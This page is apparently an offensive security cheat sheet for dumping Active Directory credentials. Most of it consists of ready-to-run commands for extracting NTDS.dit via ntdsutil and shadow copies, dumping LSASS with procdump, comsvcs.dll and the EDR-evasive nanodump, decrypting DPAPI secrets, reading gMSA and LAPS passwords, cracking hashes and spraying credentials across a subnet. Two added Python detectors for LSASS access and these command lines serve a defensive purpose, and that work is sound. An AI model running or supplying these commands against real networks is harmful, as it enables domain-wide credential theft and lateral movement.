Credential Dumping


Pull credentials from anywhere in AD: from the DC’s NTDS.dit, from local SAM, from LSASS, from gMSA blobs, from LAPS attributes. DCSync gets its own file because it’s the single most important credential dump path, see DCSync.

DC=10.10.11.50
DOMAIN=corp.local
USER='svc_user'
PASS='Password1'

i. Remote SAM + LSA dump (local admin needed)

When you’re local admin on any host (not a DC), secretsdump pulls the local SAM, LSA secrets and cached domain creds:

impacket-secretsdump $DOMAIN/$USER:$PASS@host.$DOMAIN
impacket-secretsdump -hashes :$NTHASH $DOMAIN/$USER@host.$DOMAIN
impacket-secretsdump -k -no-pass $DOMAIN/$USER@host.$DOMAIN
## Output sections:
## [*] SAM:           local Administrator + local user NTLM hashes
## [*] CACHED:        mscash2 hashes for last 10 logged-in domain users
## [*] LSA SECRETS:   service account passwords (often cleartext)
## [*] DPAPI_SYSTEM:  master key for SYSTEM DPAPI

The LSA SECRETS section is gold - service accounts running on the host often have cleartext passwords there. Spray these everywhere.

Cached domain creds (mscash2) crack at hashcat -m 2100:

hashcat -m 2100 mscash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

ii. NTDS.dit dump (Domain Admin or DRSUAPI rights)

The whole AD database. Every user’s NT hash. DCSync is the API-based method, see DCSync. Two alternative methods if DCSync is blocked:

Method A: VSS snapshot on the DC

You need SYSTEM on the DC for this:

ntdsutil "ac i ntds" "ifm" "create full c:\windows\temp\ntds" q q
## Files created:
## C:\Windows\Temp\ntds\Active Directory\ntds.dit
## C:\Windows\Temp\ntds\registry\SYSTEM
## C:\Windows\Temp\ntds\registry\SECURITY

Or with raw VSS:

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY
vssadmin delete shadows /shadow={ID}

Then offline parse:

impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL

Method B: WMIExec ntdsutil

When you have DA but want to run it remotely:

impacket-secretsdump -use-vss $DOMAIN/Administrator:$PASS@$DC

-use-vss triggers Volume Shadow Copy and ntdsutil remotely instead of using DRSUAPI. Useful when DCSync is restricted but you have SYSTEM-level access.

iii. LSASS dump (from compromised user/computer)

Different from DCSync - LSASS gives you the credentials of CURRENTLY LOGGED IN users on that host. Often includes recent admin sessions with cleartext (older Windows) or NTLM (modern).

procdump (signed Microsoft binary, usually allowed):

procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp

comsvcs.dll trick (no external binary):

$id = (Get-Process lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $id C:\Windows\Temp\lsass.dmp full

nanodump (EDR-evasive):

nanodump.exe --write C:\Windows\Temp\lsass.dmp

Parse on attacker:

impacket-pypykatz lsa minidump lsass.dmp
## or mimikatz on Windows:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

LSA Protection (PPL)

Server 2019+ and Win10 with PPL block standard LSASS dumps. Bypass tools: PPLdump, PPLBlade, mimikatz !+ driver. See PrivEsc - Credentials & Files.
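Defender’s view of the above, as an added example (not from the page or any tool it names): every one of these dumps opens a handle to lsass.exe with memory-read rights, which Sysmon logs as Event ID 10 (ProcessAccess). The script parses the Event Viewer rendering of such events, decodes GrantedAccess, looks for minidump modules or unbacked code in CallTrace, and tolerates a small allowlist of system images. Sample events, PIDs, offsets and the allowlist are constructed.

```python
"""Flag handle opens on lsass.exe that look like a memory dump, from Sysmon Event ID 10.

Added example for this page (not Sysmon's, not from any tool named here). Sample events
are constructed (PIDs and CallTrace offsets are invented); the allowlist is an assumption.
"""

# PROCESS_* access rights from winnt.h. A minidump needs at least PROCESS_VM_READ plus
# QUERY_INFORMATION or QUERY_LIMITED_INFORMATION; many tools simply request 0x1FFFFF.
ACCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
PROCESS_VM_READ = 0x0010

# Images that legitimately touch lsass memory on this (constructed) estate. Full lowercase
# paths on purpose, so a same-named binary in a user-writable directory does not match.
ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}

# CallTrace modules that point at minidump APIs, or at code backed by no module at all.
CALLTRACE_MARKERS = {
    "dbgcore.dll": "MiniDumpWriteDump lives here",
    "dbghelp.dll": "MiniDumpWriteDump wrapper",
    "comsvcs.dll": "MiniDump export reached via rundll32",
    "unknown": "caller is unbacked memory (injected or reflective code)",
}

def parse_event(text: str) -> dict:
    """Turn the Event Viewer 'Key: Value' rendering of a Sysmon event into a dict."""
    fields = {}
    for line in text.strip().splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def decode_access(mask: int) -> list:
    """Name the PROCESS_* bits set in a GrantedAccess mask."""
    if mask & PROCESS_ALL_ACCESS == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in ACCESS_RIGHTS.items() if mask & bit]

def assess(fields: dict):
    """Return an alert dict for a dump-like access to lsass.exe, or None."""
    if not fields.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    mask = int(fields.get("GrantedAccess", "0"), 16)
    source = fields.get("SourceImage", "")
    calltrace = fields.get("CallTrace", "").lower()
    reasons = []
    if mask & PROCESS_VM_READ:
        reasons.append("GrantedAccess includes PROCESS_VM_READ")
    reasons += [f"CallTrace contains {m}: {why}" for m, why in CALLTRACE_MARKERS.items() if m in calltrace]
    if not reasons:
        return None
    # Allowlisted images are tolerated unless the call comes from unbacked memory.
    if source.lower() in ALLOWLIST and "unknown" not in calltrace:
        return None
    return {"source": source, "pid": fields.get("SourceProcessId"),
            "granted": f"0x{mask:X}", "rights": decode_access(mask), "reasons": reasons}

def scan(events):
    """Assess a batch of rendered events and keep only the alerts."""
    return [a for a in (assess(parse_event(e)) for e in events) if a]

SAMPLE_EVENTS = [
    # comsvcs.dll MiniDump via rundll32, the "no external binary" path above
    r"""SourceProcessId: 4812
SourceImage: C:\Windows\System32\rundll32.exe
TargetImage: C:\Windows\System32\lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Windows\System32\KERNELBASE.dll+2bd8e|C:\Windows\System32\comsvcs.dll+1b3a2""",
    # csrss opening lsass at boot: broad rights, but allowlisted and module-backed
    r"""SourceProcessId: 568
SourceImage: C:\Windows\System32\csrss.exe
TargetImage: C:\Windows\System32\lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Windows\System32\csrsrv.dll+5c1a""",
    # Task Manager listing processes: query-only rights, no memory read
    r"""SourceProcessId: 6120
SourceImage: C:\Windows\System32\Taskmgr.exe
TargetImage: C:\Windows\System32\lsass.exe
GrantedAccess: 0x1000
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Windows\System32\KERNELBASE.dll+2bd8e|C:\Windows\System32\Taskmgr.exe+4f21c""",
    # unknown tool in a user-writable directory, calling from unbacked memory
    r"""SourceProcessId: 7344
SourceImage: C:\Users\Public\dumper.exe
TargetImage: C:\Windows\System32\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Windows\System32\KERNELBASE.dll+2bd8e|UNKNOWN(000001F2C4A50000)""",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The two signals worth keeping are PROCESS_VM_READ on lsass from anything outside the allowlist, and a CallTrace that ends in UNKNOWN; the bare 0x1FFFFF request is noisy on its own because csrss and wininit legitimately ask for it.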

iv. DPAPI: decrypt user secrets at rest

Every Windows user has DPAPI master keys protecting their saved creds (browser, RDP, mail). Three ways to decrypt:

A) With user’s password (local user)

mimikatz # dpapi::masterkey /in:"C:\Users\u\AppData\Roaming\Microsoft\Protect\SID\MK" /password:"userpass"

B) With user’s NT hash (domain user)

mimikatz # dpapi::masterkey /in:"...\MK" /sid:S-1-5-21-... /hash:$NTHASH

C) Domain backup key (Domain Admin, decrypts EVERY user’s DPAPI)

Get the backup key:

impacket-secretsdump -just-dc-user 'krbtgt' -dc-ip $DC $DOMAIN/Administrator:$PASS@$DC
## or specifically:
mimikatz # lsadump::backupkeys /system:$DC /export
## or
impacket-dpapi backupkeys -t $DOMAIN/Administrator:$PASS@$DC

Then decrypt any user’s DPAPI:

impacket-dpapi masterkey -file "MK_FILE" -pvk domain_backupkey.pvk
impacket-dpapi credential -file CRED_FILE -key MASTERKEY

SharpDPAPI (Windows side):

SharpDPAPI.exe backupkey
SharpDPAPI.exe triage /pvk:BASE64
SharpDPAPI.exe credentials /pvk:BASE64

v. gMSA passwords

Group Managed Service Accounts have rotating passwords stored in msDS-ManagedPassword. If you’re allowed to read it (PrincipalsAllowedToRetrieveManagedPassword), you get the current and previous password as a blob.

nxc reads and decodes:

nxc ldap $DC -u $USER -p $PASS --gmsa
## Output: NTLM hash of the gMSA account, ready for PtH

Manual via bloodyAD + gMSA decoder:

bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get object 'gmsa$' --attr msDS-ManagedPassword
## Then decode the blob with gMSADumper.py or similar

Use the hash:

nxc smb $DC -u 'gmsa$' -H $NTHASH
impacket-getTGT $DOMAIN/'gmsa$' -hashes :$NTHASH -dc-ip $DC

vi. LAPS passwords

The local administrator password of a LAPS-managed computer, readable by whoever is allowed to read the attribute.

Legacy LAPS (ms-Mcs-AdmPwd)

Stored as cleartext in the attribute:

bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get object 'COMPUTER$' --attr ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime
## nxc module:
nxc ldap $DC -u $USER -p $PASS --laps
## All readable LAPS:
nxc ldap $DC -u $USER -p $PASS -M laps

Windows LAPS v2 (msLAPS-Password)

Newer format, may be encrypted with a domain key. nxc handles decryption when possible:

nxc ldap $DC -u $USER -p $PASS --laps

Plaintext attribute (when encryption not enabled):

bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get object 'COMPUTER$' --attr msLAPS-Password

Encrypted attribute requires the domain DPAPI key OR a Windows host where you can call the LAPS API:

Get-LapsADPassword -Identity computer$ -AsPlainText

vii. Cached domain credentials (mscash2)

The last N domain users to log in to a workstation have their creds cached locally (default N=10, hashed as mscash2). Pulled by secretsdump on local hosts (see section i).

Domain login cache:
contoso.local\jdoe:$DCC2$10240#jdoe#abc123...

Crack:

hashcat -m 2100 cache.txt rockyou.txt -r OneRuleToRuleThemAll.rule

mscash2 can’t be used for Pass-the-Hash; you need to crack it to recover the actual password.

viii. DPAPI from offline files

When you have access to a user’s profile dir but no Windows host:

## Find master keys
find /mnt/profile -name 'MK' 2>/dev/null
## Decrypt with impacket-dpapi using NT hash or domain backup key
impacket-dpapi masterkey -file MK_FILE -sid S-1-5-21-... -password $USERPASS
impacket-dpapi masterkey -file MK_FILE -pvk domain_backupkey.pvk

Browser creds (Chromium-based) are AES-encrypted with a key wrapped by DPAPI. Pull the key from Local State, decrypt with the master key, decrypt the Login Data SQLite blobs.

ix. Kerberos ticket cache

Tickets live in /tmp/krb5cc_* (Linux) or in LSA memory (Windows). These are already-active tickets you can PtT with.

Linux side:

ls -la /tmp/krb5cc_*
klist                                          ## current cache
klist -c /tmp/krb5cc_1001                      ## specific file
export KRB5CCNAME=/tmp/krb5cc_1001

Windows side:

Rubeus.exe triage                              ## list tickets per session
Rubeus.exe dump                                ## dump all ticket blobs
Rubeus.exe dump /service:krbtgt /luid:0x3e7   ## specific service ticket
klist

Tickets from another user’s session (requires SeImpersonate or admin):

Rubeus.exe dump /luid:0x12345

x. DSRM password / Directory Services Restore Mode

The local admin password set during DC promotion. If it’s left unchanged, or synced to a domain account, it leads to DA. Read it with mimikatz on a DC:

mimikatz # lsadump::sam
mimikatz # lsadump::secrets

The DSRM password survives even when the domain is reset.

xi. Registry-based secret dumping

When you can read SECURITY hive, you can pull LSA secrets and cached creds offline:

reg save HKLM\SECURITY C:\Windows\Temp\SECURITY
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
reg save HKLM\SAM C:\Windows\Temp\SAM

Then:

impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

Useful when you have SeBackupPrivilege but not full admin, see PrivEsc - Tokens & Privileges.
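Sections ii, iii and this one all leave a process-creation trail (Sysmon Event ID 1 or Security 4688 with command-line auditing on), and per section ii the remote -use-vss variant runs the same vssadmin/ntdsutil commands on the DC. As an added example (not from impacket, nxc or any SIEM), the following matches a JSON-lines export of such events against patterns derived only from the commands shown on this page, and raises severity when a shadow copy is created on a domain controller; hosts, users and events are constructed.

```python
"""Match process-creation command lines against the credential-extraction commands on this
page, over a JSON-lines export of Sysmon Event ID 1 / Security 4688 (command-line auditing on).

Added example (not from impacket, nxc or any SIEM vendor). Patterns are derived only from
the commands shown in sections ii, iii and xi; hosts, users and events are constructed.
"""
import json
import re

# (name, severity, regex, what it indicates). Matched case-insensitively.
RULES = [
    ("ntds_ifm", "critical", r"\bntdsutil(?:\.exe)?\b.*\b(?:ifm|create\s+full)\b", "NTDS.dit export via ntdsutil IFM"),
    ("vss_ntds_copy", "critical", r"HarddiskVolumeShadowCopy\d+\\.*\bntds\.dit\b", "ntds.dit copied out of a shadow copy"),
    ("vss_create", "medium", r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", "shadow copy created (raw VSS or -use-vss); backups do this too"),
    ("hive_save", "high", r"\breg(?:\.exe)?\s+save\s+\"?HKLM\\(?:SAM|SECURITY|SYSTEM)\b", "SAM/SECURITY/SYSTEM hive saved to disk"),
    ("comsvcs_minidump", "high", r"\bcomsvcs(?:\.dll)?\b.*\bMiniDump\b", "LSASS minidump via comsvcs.dll"),
    ("procdump_lsass", "high", r"\bprocdump(?:\.exe)?\b.*-ma\s+lsass\b", "LSASS dump via procdump"),
]
COMPILED = [(n, sev, re.compile(rx, re.IGNORECASE), what) for n, sev, rx, what in RULES]

# Constructed: the hosts where NTDS.dit actually lives. A shadow copy there is not "medium".
DOMAIN_CONTROLLERS = {"dc01.corp.local"}


def match_rules(command_line: str) -> list:
    """Names of all rules whose pattern occurs in the command line."""
    return [n for n, _, rx, _ in COMPILED if rx.search(command_line)]


def scan(jsonl_lines):
    """One alert per (event, rule) hit, with severity raised for shadow copies on a DC."""
    alerts = []
    for line in jsonl_lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        cmd = ev.get("CommandLine", "")
        host = ev.get("Computer", "").lower()
        for name, sev, rx, what in COMPILED:
            if not rx.search(cmd):
                continue
            if name == "vss_create" and host in DOMAIN_CONTROLLERS:
                sev = "critical"
            alerts.append({"rule": name, "severity": sev, "what": what, "host": ev.get("Computer"),
                           "user": ev.get("User"), "parent": ev.get("ParentImage"), "command_line": cmd})
    return alerts


# Constructed SIEM export: five hits (the page's own commands) and two benign look-alikes.
SAMPLE_EVENTS = [
    r'{"Computer": "DC01.corp.local", "User": "CORP\\Administrator", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "ntdsutil \"ac i ntds\" \"ifm\" \"create full c:\\windows\\temp\\ntds\" q q"}',
    r'{"Computer": "DC01.corp.local", "User": "CORP\\Administrator", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "vssadmin create shadow /for=C:"}',
    r'{"Computer": "DC01.corp.local", "User": "CORP\\Administrator", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\temp\\"}',
    r'{"Computer": "WS07.corp.local", "User": "CORP\\svc_user", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "reg save HKLM\\SAM C:\\Windows\\Temp\\SAM"}',
    r'{"Computer": "WS07.corp.local", "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "reg save HKLM\\Software\\Contoso\\App C:\\backup\\app.hiv"}',
    r'{"Computer": "FS02.corp.local", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "vssadmin list shadows"}',
    r'{"Computer": "WS07.corp.local", "User": "CORP\\svc_user", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 712 C:\\Windows\\Temp\\lsass.dmp full"}',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["host"], alert["rule"], "-", alert["what"])
```

The hive rule deliberately matches only the SAM, SECURITY and SYSTEM hives, so ordinary `reg save` of application keys stays quiet, and `vssadmin create shadow` is kept at medium off the DCs because backup jobs produce it constantly; the parent image is carried along because a shell spawned by a service, rather than by an interactive logon, is what distinguishes the remote variant in triage.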

xii. SCCM secrets

SCCM (Configuration Manager) stores Network Access Account credentials. If you compromise an SCCM-managed host, the NAA cred is on disk:

## CIM/WMI query:
Get-WmiObject -Namespace 'ROOT\ccm\policy\machine\actualconfig' -Class CCM_NetworkAccessAccount
## Decryption via SharpSCCM or sccmhunter

nxc has an SCCM module:

nxc smb host.$DOMAIN -u $USER -p $PASS -M sccm

xiii. Hash type reference

| Hash | hashcat -m | Where it comes from |
| --- | --- | --- |
| NTLM | 1000 | SAM, LSASS, NTDS.dit |
| NetNTLMv2 | 5600 | Responder capture |
| mscash2 (DCC2) | 2100 | Cached domain creds |
| Kerberos TGS RC4 | 13100 | Kerberoasting |
| Kerberos TGS AES128 | 19600 | Kerberoasting (AES128) |
| Kerberos TGS AES256 | 19700 | Kerberoasting (AES256) |
| Kerberos AS-REP RC4 | 18200 | ASREP-Roast |
| sha512crypt | 1800 | Linux $6$ |
| KeePass | 13400 | .kdbx |

xiv. After dumping

Run BloodHound, mark every account whose hash you now have as owned. New paths open up. Spray each cred (it’s not paranoid - admin reuse is the default):

nxc smb 10.10.11.0/24 -u admin_user -H $NTHASH --local-auth --continue-on-success
nxc smb 10.10.11.0/24 -u admin_user -p $CLEARTEXT --local-auth --continue-on-success

Then push to DCSync if you haven’t already, see DCSync.